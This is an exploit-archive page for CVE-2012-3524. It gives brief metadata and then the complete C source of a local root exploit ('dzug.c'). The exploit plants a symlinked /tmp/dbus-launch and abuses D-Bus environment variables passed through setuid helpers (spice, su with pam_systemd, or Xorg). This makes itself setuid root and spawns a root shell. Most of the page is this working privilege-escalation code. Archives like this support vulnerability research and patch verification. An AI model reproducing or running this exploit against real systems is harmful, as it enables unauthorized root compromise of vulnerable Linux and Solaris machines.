dzug.c CVE-2012-3524 PoC

vendor:

N/A

by:

Sebastian Krahmer

7,8

CVSS

HIGH

Insecure getenv() by default

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: CVE-2012-3524

CPE: N/A

Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2012-3524/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2012-3524/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2012-3524/, https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2012-3524/, https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-alas-2012-128/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-1261/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-1325/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Solaris

2012

This is a PoC exploit for CVE-2012-3524, which is an insecure getenv() by default vulnerability. The exploit uses a trivial non-dbus root exploit to gain access to the system. It uses a pam_systemd vector, a spice vector, and an Xorg vector to gain access.

Mitigation:

Ensure that the getenv() function is not used in a vulnerable manner.

Source

Exploit-DB raw data:

/* dzug.c CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer
 *
 * Trivial non-dbus root exploit. (Yes, it is 2012!)
 *
 * The underlying bug (insecure getenv() by default) has been
 * reported ages ago, but nobody really cared. Unless you have an
 * exploit...
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/signal.h>
#include <sys/stat.h>


int main(int argc, char **argv)
{
	int i = 0;
	struct stat st;
	pid_t pid = 0;
	char *env[] = {
	    "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin",
	    "DBUS_STARTER_BUS_TYPE=system",
	    "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:",
	    NULL,
	    NULL
	};


	/* the pam_systemd vector */
	char *su[] = {"/bin/su", NULL, "blah", NULL};

	/* the spice vector */
	char *spice[] = {"/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper", NULL};

	/* the Xorg vector, for older Linux dists and Solaris */
	char *xorg[] = {"/usr/bin/Xorg", ":7350", NULL};

	char **a = xorg;
	char *dbus[] = {"/tmp/dbus-launch", NULL};
	char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL};
	char me[0x1000];

	if (geteuid() == 0 && argc > 1) {
		chown("/tmp/dbus-launch", 0, 0);
		chmod("/tmp/dbus-launch", 04755);
		exit(errno);
	} else if (geteuid() == 0) {
		setuid(0);
		execve(*sh, sh, NULL);
		return errno;
	}

	printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n");
	memset(me, 0, sizeof(me));

	if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) {
		/* Solaris */
		readlink("/proc/self/path/a.out", me, sizeof(me) - 1);
	}
	symlink(me, "/tmp/dbus-launch");

	if (stat(spice[0], &st) == 0) {
		if ((st.st_mode & 04000) == 04000) {
			printf("[+] Using spice helper ...\n");
			a = spice;
		}
	} else if (stat("/lib64/security/pam_systemd.so", &st) == 0) {
		printf("[+] Using pam_systemd helper (type user passwd when asked) ...\n");
		env[3] = "DISPLAY=:7350";
		su[1] = getenv("USER");
		a = su;
	} else if (stat(xorg[0], &st) == 0) {
		if ((st.st_mode & 04000) == 04000)
			printf("[+] Using Xorg helper ...\n");
		else {
			printf("[-] No suitable suid helper found.\n");
			exit(0);
		}
	} else {
		printf("[-] No suitable suid helper found.\n");
		exit(0);
	}

	if ((pid = fork()) == 0) {
		execve(*a, a, env);
		exit(0);
	}

	printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n");

	for (i = 0; i < 10; ++i) {
		sleep(1);
		printf("."); fflush(stdout);
	}
	kill(pid, SIGKILL);
	waitpid(pid, NULL, 0);

	for (;;) {
		stat(*dbus, &st);
		if ((st.st_mode & 04755) == 04755)
			break;
		sleep(1);
	}
	printf("\n[!] Hurra!\n");

	execve(*dbus, dbus, NULL);
	return errno;
}